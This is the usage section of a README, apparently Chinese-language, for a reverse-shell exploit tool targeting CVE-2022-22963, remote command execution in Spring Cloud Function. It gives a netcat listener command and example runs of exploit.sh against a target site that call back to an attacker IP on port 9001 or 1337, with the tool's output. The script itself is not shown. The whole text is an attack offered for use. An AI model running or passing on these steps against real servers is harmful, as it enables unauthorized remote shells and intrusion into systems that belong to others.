用于 CVE-2022-22963 远程命令执行的 Spring Cloud Function 漏洞利用工具
在你的主机上运行 netcat:
$ nc -lvnp 9001
在攻击者主机上使用默认端口 9001 运行漏洞利用工具(示例):
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done
在攻击者主机上使用指定端口 1337 运行漏洞利用工具(示例):
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done